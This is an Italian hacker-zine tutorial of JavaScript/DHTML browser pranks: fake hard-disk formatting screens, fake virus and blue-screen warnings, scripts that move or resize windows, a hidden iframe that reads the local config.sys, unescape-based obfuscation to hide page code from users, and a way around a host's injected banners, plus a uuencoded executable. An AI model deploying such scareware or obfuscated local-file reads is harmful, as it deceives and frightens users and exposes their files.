ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Cose piu' o meno interessanti riguardo al javascript. Io sono un vero appassionato di javascript, non di java che e' un linguaggio completo, ma proprio del javascript.. quel codice subdolo che ciascuno puo' inserire in una pagina web senza dover sostenere nessun esame o sottostare ad alcuna regola. Questo perche' il javascript e' fondamentalmente sicuro. A parte il crashing del browser INFATTI non e' possibile in alcun modo violare anche minimamente la sicurezza di un sistema.. questo PERO' OVVIAMENTE a meno di 'volontarie' dichiarazioni di assenso espresse con leggerezza da un utente sprovveduto. E' possibile infatti far partire da javascript qualunque tipo di programma presente sull'hd .. ma viene sempre chiesto all'utente di 'acconsentire' all'operazione e viene subito informato che la medesima presenta dei risvolti decisamente poco felici. E' possibile inviare ad un indirizzo email alcuni vostri dati: l'IP, il nome del vostro server, la data, l'ora, il tipo di browser che state usando.. ecc.. Anche qui viene richiesta prima una conferma pero'. Insomma, queste ed altre cose di varia' umanita' informatica. Queste sono cmq nozioni di base a conoscenza della maggior parte delle persone che navigano in rete con un minino di Know how. Per tutti gli altri ;-) .. esistono vari trucchi per far credere che determinati programmi sono stati avviati in maniera 'maliziosa' e invisibile e che allo stato attuale: 1. Il vostro hd viene formattato. 2. Un virus e' stato installato nel vostro command.com 3. Il vostro computer e' andato in crash irreversibile ecc... Sono ovviamente tutti trucchi come ho gia' detto ma di recente con l'entrata in scena del DHTML (Dynamic HTML) e' possibile dare una maggiore corposita' a questi giochi tanto da lasciare abbastanza sconcertati anche i navigatori piu' vispi. Fino ad ora si vedeva avanzare la percentuale che avvisava della formattazione sulla barra di stato del browser: function format(percento){ if(percento < 100) { percento++; window.status="Formating drive C:\\: "+percento+"% complete" fid=window.setTimeout("format("+percento+")",300); } else window.status="Drive C:\ Formatted."; } O anche la percentuale che avvertiva del virus che veniva downlodato ed installato: function virus(percento){ if(percento < 100) { percento++; window.status="Downloading virus: "+percento+"% complete" fid=window.setTimeout("virus("+percento+")",300); } else window.status="You are infected."; } O al massimo la finestrella che avvertiva su determinati eventi accaduti a vostra insaputa. alert(' qualcosa ') .. o confirm(' qualcosa ') as esempio: <script> window.alert("Warning! Your browser has detected a virus in this page. ") window.alert("Click OK to continue. The virus MAY not affect you. reset your computer right now. ") </script> Or else .. fanno un po ridere queste cose vero? :)) Beh .. queste vi faranno ridere di meno! :) Questi che vi presento sono aluni sorgenti che ho fatto molto rapidamente.. in effetti non sono un gran che di elegante ma cmq funzionano e non sono nati assolutamente per avere delle pretestuosita' professionali o altro. Sono solo dei puri e semplici giochini. E' da premettere che potete eseguirli tutti senza alcun problema, non procurano alcun danno ne violano in alcun modo la sicurezza del vostro sistema. Per chi volesse vederli all'opera direttamente dalla rete senza doverseli copiare in un file html potra' farlo andando qui: www.spippolatori.com/crepacuore.htm Crepacuore e' il titolo (spero azzeccato) di questa gradevole presentazione. :)) Tutti gli script si basano su POCHE utilissime funzioni javascript presenti nei browser piu' recenti. IE4 NS4. (che poi sono quelli piu' usati in assoluto) Le ho divise in 5 gruppi elementari 1. Funzioni per muovere e ridimensionare la finestra principale del browser: self.moveTo(x,y) [ sposta la finestra in riferimento assoluto relativamente al desktop prendendo come punto origine (0,0) il pixel in alto a sinistra. ] self.moveBy(x,y) [ sposta la finestra relativamente alla posizione attuale di x pixel in orizzontale e y pixel in verticale ] self.resizeTo(x,y) [ ridimensiona la finestra alle dimensioni assolute x,y pixel ] self.resizeBy(x,y) [ restringe o allarga la finestra di x pixel in orizzontale e y pixel in verticale] 2. Funzioni per conoscere le dimensioni del proprio schermo screen.width [ dimensione in orizzontale ] screen.height [ dimensione in verticale ] Se avete una risoluzione video di 800 x 600 con <script> largo = screen.width lungo = screen.height </script> memorizzate in largo (800) e nella variabile lungo (600) .. e' possibile usare questi parametri per posizionare ad esempio un qualcosa al centro del propri desktop Mettiamo di voler ridimensionare il proprio browser a 100x100 pixel e di voler posizionare l'angolo in alto a sinistra al centro del desktop. si fa cosi': <script> Cx = screen.width / 2 Cy = screen.height / 2 self.resizeTo(100,100) self.moveTo(Cx,Cy) </script> semplice no!? 3. Funzioni specifiche text/css per il posizionamento del testo sullo schermo. Qui e' necessario crearsi uno style text. Lo style e' un testo dichiarato che viene posizionato mediante alcuni puntatori. Per avere un esempio di come funziona potete scaricarvi la pagina iniziale del sito www.spippolatori.com e guardare come e' stata fatta. 4. Funzioni proprie del DHTML per l'orientamento del testo. Guardare l'esempio G.htm 5. Funzioni matematiche contenute nella libreria Math.xxx Gli script sono i seguenti .. non li commento perche' sono semplicissimi. Anche in considerazione del fatto che chi non conosce il javascript avra' cmq serie difficolta' nel capirli.. e per coloro che ne conoscono anche poco non c'e' nessun problema.. ogni procedura e' dichiarata in modo preciso e 'minimo' tanto da dare immediatezza di compresione ai vari meccanismi di elaborazione. FORMATTATORE IMMEDIATO DI HD. :) -----------------------------------------------------------------------------------------<script> var t=screen.width+100 var q=screen.height+200 self.moveTo(0,0) self.resizeTo(0,0) function m(){ self.moveTo(-30,-150) self.resizeTo(t,q) document.all.h.style.pixelTop=60 document.all.h.style.pixelLeft=20 document.all.h.style.fontSize="16pt" } function n(){ a++ if(a<=100){ h.innerHTML = "<FONT face='Fixedsys' color=#999999>Microsoft(R) Windows 9x <BR>   (C)Copyright Microsoft Corp 1981-1998.<BR><BR> <BR>C:\>format C: /AUTOTEST<BR><BR>ATTENZIONE: TUTTI I DATI SUL DISCO FISSO C: <BR>ANDRANNO PERSI<BR><BR>Continuare con la formattazione (S/N)? S<BR><BR> Controllo del formato del disco.<BR>Verifica del formato in corso.<BR><BR>    "+a+"% PERCENTO COMPLETATO.</FONT>"; } else h.innerHTML = "<FONT face='Fixedsys' color=#999999>Microsoft(R) Windows 9x<BR>    (C)Copyright Microsoft Corp 1981-1998.<BR><BR><BR>C:\> format C: /AUTOTEST<BR><BR>ATTENZIONE: TUTTI I DATI SUL DISCO FISSO C:<BR> ANDRANNO PERSI<BR><BR>Continuare con la formattazione (S/N)? S<BR><BR> Controllo del formato del disco.<BR>Verifica del formato in corso.<BR> <BR>   FORMATTAZIONE COMPLETATA.<BR><BR>Etichetta di volume (11 caratteri, INVIO per non darne)?<BR><BR>Numero di serie del volume: 391B-07F7<BR><BR>C:\></FONT><FONT font-size='10pt' face='Arial' color=#AA0000>Javascript Formatter By Master - Hacker .. Have a nice day! ;-)</FONT>"; setTimeout("n()",100) } </script> <STYLE TYPE="text/css"> #m1{ position: absolute;font-name:Arial Bold;color:white}; #h{font-color: white;font-name: Trouble MS;} </STYLE> <BODY BGCOLOR=#000000 onLoad="a=0;m();n()"> <DIV ID="m1"> </DIV> <FONT><DIV ID="h" STYLE="position:relative; left: 100px; top: 200px; width: 1000px; height: 300px; color: WHITE;"></DIV></FONT> </BODY> -----------------------------------------------------------------------------------------FORMATTATORE DI HD CON AVVISO DI ACTIVEX E CLESSIDRA SUL MOUSE. -----------------------------------------------------------------------------------------<script> var t=screen.width+100 var q=screen.height+200 self.moveTo(0,0) self.resizeTo(0,0) function m(){ self.moveTo(-30,-150) self.resizeTo(t,q) document.all.h.style.pixelTop=60 document.all.h.style.pixelLeft=40 document.all.h.style.fontSize="16pt" } function w(){ a=window.confirm("Internet Explorer ha rilevato l\'esecuzione senza conferma di un ActiveX\nQuesto tipo di file non comprensivo di firma puo\' contenere virus e programmi che potrebbero danneggiare il sistema.\nSi consiglia di riavviare il computer e controllare il disco rigido con un antivirus.\n\nActiveX Name : [sconosciuto]\nOriginating IP [ 194.183.212.37 ] (Impossible to resolve) \n\nRegX : AX:000 BX:001 CX:027\nRegX : DX:021 SX:027 NX:000\n\n\n TERMINA IL PROCESSO ? ") } function n(){ a++ if(a>=7&&a<=100){ // Questi servono per visualizzare la clessidra sul mouse. ;-) t=Math.floor(4*(a/4-Math.floor(a/4))) if(t==0)k.innerHTML = '<IFRAME STYLE="width=1px; height=1px;" NAME="p" SRC="file://c:/config.sys" >' else if(t==1)k.innerHTML = '<IFRAME STYLE="width=1px; height=1px;" NAME="p" SRC="file://c:/windows/leggimi.txt" >' else if(t==2)k.innerHTML = '<IFRAME STYLE="width=1px; height=1px;" NAME="p" SRC="file://c:/windows/rete.txt" >' else if(t==3)k.innerHTML = '<IFRAME STYLE="width=1px; height=1px;" NAME="p" SRC="file://c:/windows/IE4 Setup Log.Txt" >' // ----------------------------------------------------------} var a1="<FONT face='Fixedsys' color=#999999>Microsoft(R) Windows 9x<BR>    (C)Copyright Microsoft Corp 1981-1998." var a2="<BR><BR><BR>C:\>format C: /AUTOTEST" var a3="<BR><BR>ATTENZIONE: TUTTI I DATI SUL DISCO FISSO C:<BR>ANDRANNO PERSI<BR>" var a4="<BR>Continuare con la formattazione (S/N)? S" var a5="<BR><BR>Controllo del formato del disco." var a6="<BR>Verifica del formato in corso." var a7="<BR><BR>  "+a+"% PERCENTO COMPLETATO." var a8="<BR><BR>   FORMATTAZIONE COMPLETATA.<BR><BR>Etichetta di volume (11 caratteri, INVIO per non darne)?<BR><BR>Numero diserie del volume: 391B-07F7<BR><BR>C:\></FONT><FONT font-size='10pt' face='Arial' color=#AA0000> Javascript Formatter By Master - Hacker .. Have a nice day! ;-)</FONT> <FONT font-size='10pt' face='MS Trouble' color=#AAAA00> ALT+F4 per uscire.</FONT>" var f="</FONT>" if(a==1)h.innerHTML =a1+f else if(a==2)h.innerHTML=a1+a2+f else if(a==3)h.innerHTML=a1+a2+a3+f else if(a==4)h.innerHTML=a1+a2+a3+a4+f else if(a==5)h.innerHTML=a1+a2+a3+a4+a5+f else if(a==6)h.innerHTML=a1+a2+a3+a4+a5+a6+f else if(a>=7&&a<=100)h.innerHTML =a1+a2+a3+a4+a5+a6+a7+f else h.innerHTML=a1+a2+a3+a4+a5+a6+a8+f setTimeout("n()",100) } </script> <STYLE TYPE="text/css"> #h{font-color: white} #k{font-color: white} </STYLE> <BODY BGCOLOR=#000000 onLoad="a=0;w();m();n()"> <FONT><DIV ID="h" STYLE="position:absolute; left: 200px; top: 200px; width: 1000px; height: 300px; color: WHITE; z-index: 1;"></DIV></FONT> <FONT><DIV ID="k" STYLE="position:absolute; left: 0; top: 0; width: 1px; height: 1px; color: WHITE; z-index: 2;"></DIV></FONT> </BODY> -----------------------------------------------------------------------------------------ERRORE NEL VXD ... IL TIPICO SCHERMO BLU DANNAZIONE DEGLI UTENTI WINDOWS. -----------------------------------------------------------------------------------------<script> var t=screen.width+100 var q=screen.height+200 function m(){ self.moveTo(-30,-150) self.resizeTo(t,q) document.all.m1.style.pixelTop=(q-200)/2 document.all.m1.style.pixelLeft=(t-100)/2-240 document.all.m1.style.fontSize="14pt" document.all.m1.style.color="white" } </script> <STYLE TYPE="text/css"> #m1{ position: absolute; font-name:Arial Bold; color:#000099}; </STYLE> <BODY BGCOLOR=#000099 onLoad="m()"> <DIV ID="m1">ERRORE nel modulo VXD 4802:2320 RegX : 281 - 000 - 010 - 027</DIV> </BODY> -----------------------------------------------------------------------------------------ERRORE NEL VXD .. con aggiunta di finestra volante. hi hi hi -----------------------------------------------------------------------------------------<script> var t=screen.width+100 var q=screen.height+200 function m(){ self.moveTo(-30,-150) self.resizeTo(t,q) document.all.m1.style.pixelTop=(q-200)/2 document.all.m1.style.pixelLeft=(t-100)/2-240 document.all.m1.style.fontSize="14pt" document.all.m2.style.pixelTop=(q-200)/2+32 document.all.m2.style.pixelLeft=(t-100)/2-200 document.all.m2.style.fontSize="12pt" } function n() { x=window.open("","pippo") vola() } function vola() { x.moveTo(screen.availWidth/2+400*Math.sin(a)-100,screen.availHeight/2+250*Math.c os(a)) x.resizeTo(Math.abs(300*Math.cos(a))+100,100) a=a+6.28/130 setTimeout("vola()",10) } </script> <STYLE TYPE="text/css"> #m1{ position: absolute; font-name:Arial Bold; color:white}; #m2{ position: absolute; font-name:Arial Bold; color:yellow}; </STYLE> <BODY BGCOLOR=#000099 onLoad="a=0;b=0;m();n()"> <DIV ID="m1">ERRORE nel modulo VXD 4802:2320 RegX : 281 - 000 - 010 - 027</DIV> <DIV ID="m2">[ con aggiunta di finestra volante ;-) ]</DIV> </BODY> -----------------------------------------------------------------------------------------UNA FINESTRA SI AGGIRA MISTERIOSA PER LO SCHERMO.. DOVE MAI ANDRA'!?!? :) -----------------------------------------------------------------------------------------<HTML> <BODY> <SCRIPT LANGUAGE=JAVASCRIPT> function moveIt() { self.moveTo((screen.availWidth-800)/2+500*Math.cos(b+0.1), (screen.availHeight-600)/2+500*Math.cos(a+0.2)) self.resizeTo(400+200*Math.sin(a+0.1),400+200*Math.cos(b+0.1)) a=a+0.1 b=b+0.15 setTimeout("moveIt()",1) } </SCRIPT> <BODY BGCOLOR=#0000AA onload="a=0;b=0;moveIt()"> </BODY> </HTML> ------------------------------------------------------------------------------------------ QUESTO CODICE APRE UNA NORMALE SESSIONE DEL BROWSER E DOPO 10 SECONDI FA SCIVOLARE VIA IL BROWSER STESSO SOTTO IL VOSTRO DESKTOP. POTENZA DELLA UTILISSIMA FUNZIONE moveBy(x,y)! ;-) -----------------------------------------------------------------------------------------<HTML> <title>Movarello</title> <SCRIPT LANGUAGE=JAVASCRIPT> function seconda() { self.moveBy(0,a) a=a+0.1 pippo.value=a setTimeout("seconda()",1) } </SCRIPT> <BODY BGCOLOR=#0000AA onload="a=0;setTimeout('seconda()',10000)"> <TEXTAREA name="pippo" ROWS=1 COLS=25 WRAP="virtual"> aspetta 10 secondi! </TEXTAREA> </BODY> </HTML> -----------------------------------------------------------------------------------------QUI ANDIAMO SUL COMPLICATO.. QUESTO JAVASCRIPT + DHTML MOSTRA DEGLI ELEMENTI GRAFICI CHE SI SORMONTANO SULLE BARRE DI SCORRIMENTO DEL BROWSER. SE LO FATE GIRARE SU OUTLOOK IMPORTANDOLO COME FILE HTML .. FARA' LA STESSA COSA. E' UN DIFETTO DELLE TABLE TEXT CSS CREATE IN HTML QUANDO QUESTE SUPERANO LA DIMENSIONE VISIBILE (INNER) DEL VOSTRO BROWSER. NON E' FACILISSIMO DA CAPIRSI MA CMQ INTERESSANTE. -----------------------------------------------------------------------------------------<SCRIPT> function init(){ uno.Scale(0.4, 1.50, 1.50) due.Scale(0.40, 1.40, 1.40) tre.Scale(0.50, 1.50, 1.50) uno.rotate(90, 0, 0) due.Rotate(90, 0, 0) tre.Rotate(90, 0, 0) RotateAll() k++ } function RotateAll(){ uno.Rotate(k,0,0) due.Rotate(-k,0,0) tre.Rotate(k,0,0) setTimeout("RotateAll()", 30) } </SCRIPT> <BODY bgColor=black onLoad="k=1;init()"> <OBJECT classid=CLSID:369303C2-D7AC-11D0-89D5-00A0C90833E6 id=tre style="HEIGHT: 500px; LEFT: 0%; POSITION: relative; TOP: 0%; WIDTH: 500px; ZINDEX: 0"> <PARAM NAME="SourceURL" VALUE=""> <PARAM NAME="CoordinateSystem" VALUE="0"> <PARAM NAME="MouseEventsEnabled" VALUE="0"> <PARAM NAME="HighQuality" VALUE="0"> <PARAM NAME="PreserveAspectRatio" VALUE="-1"> <PARAM NAME="Line0001" <PARAM NAME="Line0002" <PARAM NAME="Line0003" <PARAM NAME="Line0004" <PARAM NAME="Line0005" </OBJECT> VALUE="SetLineStyle(1,0)"> VALUE="SetLineColor(255,255,0)"> VALUE="SetFillStyle(0)"> VALUE="SetFont('Arial',70,70,0,0,0)"> VALUE="Text('SPPIPPOLATORI',-90,87)"> <OBJECT classid=CLSID:369303C2-D7AC-11D0-89D5-00A0C90833E6 id=due style="HEIGHT: 500px; LEFT: 0%; POSITION: absolute; TOP: 0%; WIDTH: 500px; ZINDEX: 1"> <PARAM NAME="SourceURL" VALUE=""> <PARAM NAME="CoordinateSystem" VALUE="0"> <PARAM NAME="MouseEventsEnabled" VALUE="0"> <PARAM NAME="HighQuality" VALUE="0"> <PARAM NAME="PreserveAspectRatio" VALUE="-1"> <PARAM NAME="Line0001" VALUE="SetLineStyle(1,0)"> <PARAM NAME="Line0002" VALUE="SetLineColor(255,0,0)"> <PARAM NAME="Line0003" VALUE="SetFillStyle(0)"> <PARAM NAME="Line0004" VALUE="SetFont('Arial',180,200,0,0,0)"> <PARAM NAME="Line0005" VALUE="Text('MASTER',-90,87)"> </OBJECT> <OBJECT classid=CLSID:369303C2-D7AC-11D0-89D5-00A0C90833E6 id=uno style="HEIGHT: 500px; LEFT: 0%; POSITION: absolute; TOP: 0%; WIDTH: 500px; ZINDEX: 2"> <PARAM NAME="SourceURL" VALUE=""> <PARAM NAME="CoordinateSystem" VALUE="0"> <PARAM NAME="MouseEventsEnabled" VALUE="0"> <PARAM NAME="HighQuality" VALUE="0"> <PARAM NAME="PreserveAspectRatio" VALUE="-1"> <PARAM NAME="Line0001" VALUE="SetLineStyle(1,0)"> <PARAM NAME="Line0002" VALUE="SetLineColor(255,127,0)"> <PARAM NAME="Line0003" VALUE="SetFillStyle(0)"> <PARAM NAME="Line0004" VALUE="SetFont('Arial',180,200,0,0,0)"> <PARAM NAME="Line0005" VALUE="Text('HACKER',-90,87)"> </OBJECT> </BODY> -----------------------------------------------------------------------------------------VISUALIZZA IL VOSTRO CONFIG SYS SU UNA FINESTRELLA! ;-) -----------------------------------------------------------------------------------------<script> function vedi() {alert("TI SEMBRA CHE IL TUO FILE CONFIG.SYS SIA QUESTO?\n\nPOSSIBILE? ;-) \n\n\n\n\n"+document.p.document.body.innerHTML)} </script> <BODY onLoad="setTimeout ('vedi()', 400)"> <IFRAME STYLE="width=1px; height=1px;" NAME="p" SRC="file://c:/config.sys" > <script> -----------------------------------------------------------------------------------------FINE. Aggiungo anche un paio di cose utili a conforto della completa inutilita' dei programmi sopra. :-) ESEGUIRE DEL CODICE HTML IN ASCII PURO -----------------------------------------------------------------------------------------E' molto semplice ma allo stesso tempo efficace. Il tutto si basa sulla proprieta' della funzione javascript unescape che converte in maniera praticamente immediata del codice ASCII puro nel suo equivalente letterale. Percui e' possibile convertire intere pagine HTML in ascii tramite un programma in C il cui sorgente vi posto di seguito (comprensivo del programma gia compilato codificato uuencode alla fine di questo testo) ed eseguirle con questa semplice funzione javascript: <SCRIPT> a=" TUTTO IL CODICE ASCII PURO DELLA PAGINA HTML DA ESEGUIRE" function b(){c=unescape(a);document.write(c);}b() </SCRIPT> il programm in C TROVASCI ( TROVASCI.exe compilato) e' questo ------------------------------#include <stdio.h> #include <string.h> void main(n,file) int n; char *file[]; { char *p; int a; FILE *apri, *leggi; leggi=fopen(file[1],"rb"); p=file[1]; p[strlen(p)-1]='_'; apri=fopen(p,"wb"); while(!feof(leggi)){ a=fgetc(leggi); if(a>15) fprintf(apri,"%%%x",a); else fprintf(apri,"%%0%x",a); } fclose(apri); fclose(leggi); } ------------------------------Passandogli una pagina HTML scrivera una immagine in ascii puro. Es. TROVASCI pippo.htm creera' una immagine pippo.ht_ di pippo.htm contenente l'ascii puro. ma andiamo per ordine eseguendo un esempio pratico. Mettiamo di voler eseguire la pagina HTML <script> alert(' SEI STATO INFETTATO DA UN VIRUS ') </script> Senza che l'utente (medio) posa capire dal sorgente html di cosa si tratta. Dovremo avere a disposizione. 1. la pagina HTML (il file) contente le righe di script sopra. Chiamiamolo S.HTM 2. Il programma Trovasci. 3. un po' di pazienza. ;-) Passiamo il file S.htm contenente: -------------------------------------------<script> alert(' SEI STATO INFETTATO DA UN VIRUS ') </script> -------------------------------------------al trovasci. TROVASCI S.HTM ci troveremo un file S_HT_ contenente : -------------------------------------------%3c%73%63%72%69%70%74%3e%0d%0a%61%6c%65%72%74%28%27%20%53 %45%49%20%53%54%41%54%4f%20%49%4e%46%45%54%54%41%54%4f%20 %44%41%20%55%4e%20%56%49%52%55%53%20%27%29%0d%0a%3c%2f%73 %63%72%69%70%74%3e -------------------------------------------E' l'equivalente in ascii puro del file S.HTM ci creeremo quindi un altro file PARTI.HTM contentente il seguente codice: -------------------------------------------<SCRIPT> a="%3c%73%63%72%69%70%74%3e%0d%0a%61%6c%65%72%74%28%27%20%53%45%49%20%53%54%41%5 4%4f%20%49%4e%46%45%54%54%41%54%4f%20%44%41%20%55%4e%20%56%49%52%55%53%20%27%29% 0d%0a%3c%2f%73%63%72%69%70%74%3e" function b(){c=unescape(a);document.write(c);}b() </SCRIPT> -------------------------------------------.. eseguendolo verra' eseguito (in maniera pseudo cifrata) il contenuto originario di s.htm ------------------------------------------------------------------------------------------ APPLICAZIONE PRATICA DEL JAVASCRIPT IN CODIFICATO ASCII ELIMINAZIONE EVOLUTA DEI POPUP-WINDOW-BANNER NEI SITI WEB SPACE-FREE -----------------------------------------------------------------------------------------Lo avevo gia postato nella nostra ml. Quando si cerca casa sul web e la si trova in un hosting free tipo Geocities, freeweb, Freecity, Serer101, ecc.. ci si trova sempre a dover affrontare la realta' dei popup banner (quelle finestrelle che si aprono indipendentemente dalla vostra volonta' contenenti spesso pubblcita' insulse e penalizzanti in termini di velocita' per il vostro sito) Sono dei semplici javascript che vengono 'appesi' da programmi residenti sul server (perl, cgi.script, script C, ecc..) in fondo alle vostre pagine HTML. Generalamente e' semplicissimo eliminarli.. basta appendere in fondo alle proprie pagine una serie di due o tre </NOSCRIPT> al fine di elimarli. Ultimamente invece alcuni server (anche server101!) controllano sulla pagina la presenza o meno degli apici di chiusura <HTML> </HTML> e dei </NOSCRIPT> a seguito di questi.. quindi li eliminano. L'esecuzione allora di codice in ascii puro diventa 'miracolosa' .. il noscript viene eseguito e il server non riesce a cancellarlo..anche perche' non se ne accorge. METODO: Scrivete le vostre pagine SENZA apici <HTML> </HTML> (tanto non servono a niente!) in fondo alla pagina attaccate i vostri </NOSCRIPT> codificati! cosi': .... .... .... <script> var a="%3C%4E%4F%53%43%52%49%50%54%3E%3C%4E%4F%53%43%52%49%50%54%3E%0D%0A%3C%4E%4F%5 3%43%52%49%50%54%3E%0D%0A" function b(){c=unescape(a);document.write(c);}b() </script> e' i popup saranno eliminati ancor prima di partite! ;-) -----------------------------------------------------------------------------------------Questa volta e' veramente la fine. ;-)) Master - Hacker ----------------------------- SUPPORTI begin 644 TROVASCI.EXE M35K``1D`EP!`````___4`H``````````/@````$`^U!J<@`````````````` M```````````````````````!````6P```*`````Z`0``RP""`KX`@@*E`((" MA`""`FX`@@)2`(("+0""`A8`@@)<`@``D`(``+<"``"5`P``@`,``&H#``!4 M`P``#P,```4#``#R`@``Y`(``-@"```>`9("&@&2`A8!D@);!```+00``',$ M``"+!```J`0``"P%``!3!0``704``/`%``")!0``;`8``'8&``"E!@``LP8` M`,8&``#E!@``\P8``/\&```4!P``)`<``#X'``!.!P``8P<``','``"-!P`` MHP<``,('``#_!P``K0P``,P2``"S$@``FA(``'T2``!6$@``1A(``$$2```* M$@``\1$``.P1``#0$0``Q1$``*(1``"&$0``?!$``%X1``!'$0``/A$``/P2 M``!=%```@!0``,44``"L%```I!0``-\4``#O%```#14``!(5```K%0``E!4` M`$86```Q%P``)1<``!X7``!M&0``-!D``!L9```4&0``/A@``!@8```/&``` M]Q<``&P7``"F&0``W!H``%,:``#-&0``/!L``'\;``#^&P``'AP```\=``!& M&P``%!T``"H=``!/'0``<1T``(\=``"@'0``RQT``.D=```$'P``'A\``%L? M``"2(@``WB$``%TA```_(0``.B$``*D@``";'P``=Q\``&\C``!T(P``FB,` M`,\C```^)```'24``!0E``!;)```A"4``,<E``!L)@``128``"(F``#Z)0`` M\B4``%HG``!D)P``CR<``-LG``"V)P``K2<``/\G``#U)P`````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M`````````````````````````````````````````````+J2`BZ)%E,"M##M(8LN`@"+'BP`CMJC?0",!GL`B1YW`(DNCP#H0`'$/G4`B\>+V+G_?_SRKN-# M0R8X!77V@,V`]]F)#G4`N0(`T^.#PQ"#X_")'GD`C-(KZK^2`H[')HL^4`.! M_P`"<PB_``(FB3Y0`[$$T^]'.^]S`^F^`8O?`]J)'H<`B1Z+`*%[`"O8CL"T M2E?-(5_3Y_J.THOG^[B2`H[`)HD^4`.#/K`"%'9'@#Y]``-R0'<'@#Y^`!YR M-[@!6+L"`,TA<BJT9XL>L`+-(7(@M$B[`0#-(7(70*./`$B.P+1)S2%R"K@! M6+L``,TA<P/I10&T`,T:B1:!`(D.@P`*P'0,N$``CL"[<``FQ@<!,^TNC@93 M`KX.!+\:!.BZ`/\V<P#_-G$`_S9O`/\V;0#_-FL`F@T`@@)0D`[H#0(NC@93 M`E97OAH$OQH$Z(L`7U[+RXOLM$R*1@3-(;D.`+HO`.G:`!ZX`#7-(8D>6P", M!ET`N`0US2&)'E\`C`9A`+@%-<TAB1YC`(P&90"X!C7-(8D>9P",!FD`N``E MC,J.VKI?`<TA'\,>+HX>4P(>N``EQ19;`,TA'QZX!"7%%E\`S2$?'K@%)<46 M8P#-(1^X!B7%%F<`S2$?RX'^#@1T!#+DZP*T_XO7B]X[WW0C)H`__W08@?X. M!'0&)CIG`>L$)CAG`7<&)HIG`8O3@\,&Z]D[UW0;B]HF@#\`)L8'_P9T!R;_ M7P('Z[$F_U<"!^NJP[1`NP(`S2'#N1X`NCT`+HX>4P+HZO^X`P!0D`[H$@$` M``7`58OL'KB2`H[8@SZ2`"!U!;@!`.L<BQZ2`-'CT>.+1@B+5@:)AY8`B9>4 M`/\&D@`SP!]=RU6+[!ZXD@*.V!ZT0S+`Q58&S2$?<@K$7@HFB0\SP.L$4.B^ M`1]=RU6+[!ZXD@*.V!ZT0[`!Q58&BTX*S2$?<@0SP.L$4.B:`1]=RQZXD@*. MV!_+58OL5AZXD@*.V(MV"`OV=37K';B2`H[`)O\.D@`FBQZ2`-'CT>.XD@*. MP";_GY0`N)("CL`F@SZ2``!UUI`.Z"+^_QX4`9`.Z(+^D`[H)_Z#?@8`=14+ M]G4(_QX8`?\>'`'_=@20#N@._ED?7EW"!@!5B^P>N)("CM@SP%!0_W8&Z'S_ M'UW+58OL'KB2`H[8N`$`4#/`4/]V!NAC_Q]=RQZXD@*.V#/`4+@!`%`SP%#H M3?\?RQZXD@*.V+@!`%!0,\!0Z#K_'\M;#E.`^1!S$(O8T^#3XO;9@,$0T^L+ MT\N`Z1"2,\#3XLL'#@8+R7T,]]/WT8/#`8/1`.LO`\-S!('"`!"*Z;$$TN4" M]8KHT^@#T(K%)0\`RP<.!@O)?0SWT_?1@\,!@]$`Z]$KPW,$@>H`$(KYL032 MYS+;*].*Z-/H`]"*Q24/`,M5B^Q6'KB2`H[8BW8$"_9\%8/^6'X#OE<`B3;> M`HJ$X`*8B_#K#??>@_XC?^G'!MX"__^XD@*.P":)-G\`N/__'UY=P@(`58OL M5AZXD@*.V(MV!%;HJ?^+QA]>7<("`%6+[!ZXD@*.V+@`1(M>!LTADB6``!]= MRU6+[(/L(E97'KB2`H[8!L1^"HM>"(/[)'=<@/L"<E>+1@Z+3A`+R7T2@'X& M`'0,)L8%+4?WV??8@]D`C7;>XQ"1*]+W\Y'W\S:(%$;C"NOP*]+W\S:(%$8+ MP'7TC4[>]]D#SOQ.-HH$+`IS!`0ZZP,"1@2JXNZP`*H'BU8,BT8*'U]>B^5= MP@X`58OL'KB2`H[8,\!0_W8(_W8&_W8$N`H`4+``4+!A4.A5_Q]=P@8`58OL M'KB2`H[8BUX&T>.XD@*.P":!I[("__VT0HI&#(M>!HM."HM6",TA<@+K!5#H MI_Z9'UW+58OL'KB2`H[8BT8*"T8,=0B,7@S'1@HZ`_]V!(M&!@M&"'4'C-JX M1P/K!HM6"(M&!E)0_W8,_W8*D`[HY0:#Q`A24.A=_QZX2P-0_W8,_W8*D`[H MHQ^#Q`B+5@R+1@H?7<(*`%6+[(/L`AZXD@*.V/]V"O]V"#/`4%#$7@0F@S__ M=06X`@#K`[@!`,1>!"8!!R:+!U#H:/^)5@J)1@@6C4;^4/]V"O]V")`.Z%G\ M@\0("\!TNXM6"HM&"!^+Y5W""`!1BNBQ!-/H`]"*Q8KCT^M9`\N*W"4/`(/C M#SO1=0([P\-5B^P>N)("CMB+7@;1X[B2`H[`)O>'L@("`'0&N`4`4.L4'K0_ MBUX&BTX,Q58(S2$?<@+K!%#HA_T?7<L>N)("CMBY!0#K1(O9T>.XD@*.P";' MA[("``"+P;H4`/?JNI("B]B.PB;&AR0!_XO!NA0`]^H%(`%0B\&Z%`#WZKJ2 M`HO8CL)8)HF',@%!N)("CL`F.0ZP`G>PN)("CL`FH"0!F%"0#NAX_5D+P'4, MN)("CL`F@28B`?_]N``"4+B2`H[`)O<&(@$``G0%N`$`ZP(SP%`SP%!0N)(" M4+@@`5"0#N@*'8/$#+B2`H[`)J`X`9A0D`[H*?U9"\!U#+B2`H[`)H$F-@'_ M_;@``E"XD@*.P";W!C8!``)T!;@"`.L",\!0,\!04+B2`E"X-`%0D`[HNQR# MQ`P?PU6+[!ZXD@*.V+@!`%`SP%!0_W8&D`[HE_V#Q`@?7<M5B^P>N)("CM@> MM$'%5@;-(1]R!#/`ZP10Z$[\'UW+BL;H`@"*PM00AN#H`@"&X`20)Q1`)ZK# M58OL@>R6`%97'KB2`H[8QT;N``#'1NQ0`,=&Z@``ZTI7N?__,L#RKO?125_# M-H@%1_Y.['4S4U%2!HV&:O\K^!:-AFK_4%?_=@S_=@K_5@X+P'4%QT;J`0#' M1NQ0``%^[HV^:O\'6EE;PP;\C;YJ_XE^_(M^_,1V!B:L"L!T$CPE=!$VB`5' 